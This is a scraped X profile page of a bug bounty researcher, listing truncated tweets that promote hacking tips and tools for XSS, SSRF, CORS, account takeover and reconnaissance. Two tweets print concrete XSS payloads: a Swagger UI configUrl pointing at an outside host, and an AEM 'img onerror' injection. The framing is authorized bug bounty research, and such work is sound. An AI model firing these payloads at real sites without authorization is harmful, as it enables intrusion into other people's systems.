Jayesh Madnani (@Jayesh25) / X

Jayesh Madnani

973 posts

Jayesh Madnani

@Jayesh25

Researcher in charge @ Ethical InfoSec Services | HackerOne Top 10 | hackerone.com/jayesh25

http://hackerone.com/jayesh25

Joined February 2016

Jayesh Madnani
@Jayesh25
Oct 30, 2023
🕵️‍♂️Here's another secret no one will tell you about: A Simple WAF Bypass for Stored XSS that has earned me $$$$💰 so far! Stored XSS issues can fetch you rewards ranging from $500 to $7500, depending on the program. WAFs can pose significant challenges when hunting for Stored
145K
Jayesh Madnani
@Jayesh25
Nov 27, 2024
🚨 Yay, we were rewarded with $20,000 on our @Hacker0x01 submission for a SSRF bug discovered in collaboration with @Shlibness! 💰🎉 🥳 We uncovered a Critical SSRF vulnerability, turning it into unauthorized access to internal admin endpoints, leading to PII leaks and
69K
Jayesh Madnani
@Jayesh25
Nov 24, 2023
Bug Bounty Tips: Penetration Testing Android/iOS Apps? 📱 Today, I'd like to introduce a valuable open source tool that I frequently rely on: Mobile Security Framework (MobSF), an all-in-one mobile app pen-testing and security assessment tool. It works seamlessly with various
151K
Jayesh Madnani
@Jayesh25
Nov 18, 2023
🔐Secrets no one will share with you - Here's a technique that might grant you access to takeover other users' accounts using "Login with Facebook": Are you working on a target site that supports "Login with Facebook"? Disable email sharing during Facebook login and be ready
120K
Jayesh Madnani
@Jayesh25
Nov 6, 2023
Quick Wins: If you come across an outdated Swagger instance, always remember to test for XSS vulnerabilities. Try these payloads and earn some quick bounties! http://example(.)com/swagger-ui/index.html?configUrl=https://jumpy-floor.surge(.)sh/test.json
84K
Jayesh Madnani
@Jayesh25
Nov 30, 2023
🤔Question of the day: How to Spot CORS Misconfigurations? It is almost year 2024, yet I continue to discover CORS misconfigurations, adding $$$ to my bug bounty earnings each month. Here's my approach to finding CORS Issues: 1️⃣ Nuclei Scan - Identify vulnerable targets with
91K
Jayesh Madnani
@Jayesh25
Nov 15, 2023
Bug Bounty Tips: 🐛💰 Here's a simple bug bounty tip for shopping site targets that can earn you some serious $$$$. I've stumbled upon 10+ similar issues on shopping sites that allow guest checkouts 🛒. Many overlook these issues because they require placing an order 📦.
100K
Jayesh Madnani
@Jayesh25
Nov 2, 2023
Hunting on a target with a Salesforce site? 🕵️‍♂️ You're in luck! 🍀 There's a high likelihood of stumbling upon a misconfigured object that could yield bounties ranging from $1,000 to $5,000 due to the sensitive nature of the data. 😲 Don't be fooled, many hunters overlook these
97K
Jayesh Madnani
@Jayesh25
Dec 23, 2023
Bug Bounty Tips: Uncover misconfigured Google Drive links, open S3 buckets, Interesting APIs, Secrets, and other sensitive files with JSLuice! 🔍 JSLuice is a powerful Go package and command-line tool for extracting URLs, paths, secrets, and intriguing data from JavaScript
59K
Jayesh Madnani
@Jayesh25
Nov 11, 2023
🔍Question of the day: Where to find SSRF Issues? Many overlook testing for SSRF vulnerabilities, thinking they're complex and beyond their capabilities. 💻💔 However, these issues can lead to bounties ranging from $1000 to $15000, depending on the Impact. These are the top 5
62K
Jayesh Madnani
@Jayesh25
Dec 2, 2023
🐛Bug Bounty Tips: Using "Waymore" to discover more security Issues🌐 In the bug bounty world, having the right tools is essential. While there are many useful ones like waybackurls and gau, let's focus on "waymore" from @xnl_h4ck3r today. It's a handy tool for finding archived
39K
Jayesh Madnani
@Jayesh25
Dec 14, 2023
Bug Bounty Tips: Discovering the Origin IP by scanning your target IP range🕵️‍♂️ When you're hunting on a bug bounty target and WAF stands in your way, here's a powerful technique to uncover the Origin IP by scanning the target's IP range. We'll be using a simple yet effective
56K
Jayesh Madnani
@Jayesh25
Dec 3, 2023
🔍 Bug Bounty Tips: Crawling parameters with Katana for quick XSS/SQLI wins! 🚀 When it comes to efficient bug hunting, active crawling can be a game-changer. One of the tools I rely on is Katana, which helps retrieve URLs and parameters for thorough testing against XSS, SQLI,
44K
Jayesh Madnani
@Jayesh25
Dec 20, 2023
🔐 Bug Bounty Tips: Reported 15+ XSS Issues on a broad-scoped program leveraging AEM! 🚀 If you stumble upon a target app using AEM, make sure to use these XSS payloads for some quick wins! 💰 1️⃣ https://target[.]com/1<img src=x data'a'onerror=alert(domain)>.childrenlist.htm
43K